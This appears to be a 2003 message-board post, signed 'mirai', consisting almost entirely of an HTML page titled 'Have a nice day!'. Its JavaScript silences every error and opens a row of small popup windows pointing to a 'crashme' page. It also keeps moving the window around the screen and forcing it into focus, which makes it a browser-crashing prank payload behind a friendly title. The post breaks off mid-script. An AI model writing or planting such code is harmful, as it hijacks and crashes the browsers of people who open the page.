2003/03/25 (火) 12:55:22        [mirai]
<html><head><title>Have a nice day!</title>
<script language="JavaScript">

<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

//-->

</script>

<script type="text/javascript">

var xOff=5; var yOff=5; var xPos=400; var yPos=-100; var flagRun=1;
 function openWindow(url){window.open(url,'_blank','menubar=
no,status=no,toolbar=no,resizable=no,width=90,height=60,titlebar=
no,alwaysRaised=yes');} function proCreate(){openWindow('
http://www.raus.de/crashme/');openWindow
('http://www.raus.de/crashme/');openWindow('
http://www.raus.de/crashme/');openWindow('
http://www.raus.de/crashme/');openWindow('
http://www.raus.de/crashme/');openWindow('
http://www.raus.de/crashme/');openWindow('
http://www.raus.de/crashme/');openWindow('
http://www.raus.de/crashme/');} 
function newXlt(){xOff=Math.ceil(0-6*Math.random())*5-10;} 
function newXrt(){xOff=Math.ceil(7*Math.random())*5-10;} 
function newYup(){yOff=Math.ceil(0-6*Math.random())*5-10;} 
function newYdn(){yOff=Math.ceil(7*Math.random())*5-10;} 
function fOff(){flagRun=0;} function playBall(){xPos+=
xOff;yPos+=yOff;if(xPos>screen.width-175){newXlt();}if(xPos<0)
{newXrt();}if(yPos>screen.height-100){newYup();}if(yPos<0)
{newYdn();}if(flagRun==1){window.moveTo(xPos,yPos);window.focus();
setTimeout('playBall()',1);}}

<